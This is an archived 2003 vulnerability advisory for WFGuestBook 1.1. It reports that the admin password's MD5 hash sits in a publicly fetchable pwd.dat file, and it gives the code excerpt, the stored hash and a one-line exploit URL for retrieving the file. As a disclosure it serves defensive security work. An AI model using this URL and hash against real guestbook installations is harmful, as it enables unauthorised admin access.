logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

WFGuestBook Admin access
Date: 2003-03-22

Author : subj - r2subj3ct@dwclan.org

Product : WFGuestBook
Version : 1.1
WebSite : http://jid.2yd.ru
Problem : Admin access

[rus]

Description:
------------

index.php
=========
[...]

require ("style.php");
require ("lib.php");
$cr=chr(13).chr(10);
$ap=file("pwd.dat");

[...]
=========

pwd.dat
=======

21232f297a57a5a743894a0e4a801fc3

=======

#
password is encrypted by MD5 algorithm
#

Exploit:
--------

http://[somehost]/guestbook/pwd.dat



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy